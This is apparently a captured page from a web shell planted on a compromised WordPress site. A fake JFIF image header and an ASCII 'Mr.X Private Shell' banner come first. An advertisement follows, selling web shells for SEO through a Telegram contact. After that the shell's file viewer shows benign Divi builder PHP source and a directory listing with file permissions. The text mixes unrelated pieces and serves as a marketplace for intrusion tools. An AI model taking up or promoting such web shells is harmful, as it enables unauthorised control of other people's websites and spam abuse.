����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
abstract class ET_Builder_Module_Helper_Motion_Sanitizer extends ET_Builder_Module_Helper_Motion {
/**
* @param string $value
*
* @return string
*/
public function getStartValue( $value ) {
return $this->sanitize( parent::getStartValue( $value ) );
}
/**
* @param string $value
* @param string $multi_value
*
* @return string
*/
public function setStartValue( $value, $multi_value ) {
return parent::setStartValue( $this->sanitize( $value ), $multi_value );
}
/**
* @param string $value
*
* @return string
*/
public function getMiddleValue( $value ) {
return $this->sanitize( parent::getMiddleValue( $value ) );
}
/**
* @param string $value
* @param string $multi_value
*
* @return string
*/
public function setMiddleValue( $value, $multi_value ) {
return parent::setMiddleValue( $this->sanitize( $value ), $multi_value );
}
/**
* @param string $value
*
* @return string
*/
public function getEndValue( $value ) {
return $this->sanitize( parent::getEndValue( $value ) );
}
/**
* @param string $value
* @param string $multi_value
*
* @return string
*/
public function setEndValue( $value, $multi_value ) {
return parent::setEndValue( $this->sanitize( $value ), $multi_value );
}
abstract protected function sanitize( $value );
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Blur.php | File | 533 B | 0644 |
|
| Motions.php | File | 8.58 KB | 0644 |
|
| Opacity.php | File | 261 B | 0644 |
|
| Rotate.php | File | 250 B | 0644 |
|
| Sanitizer.php | File | 1.29 KB | 0644 |
|
| Scale.php | File | 241 B | 0644 |
|
| Translate.php | File | 237 B | 0644 |
|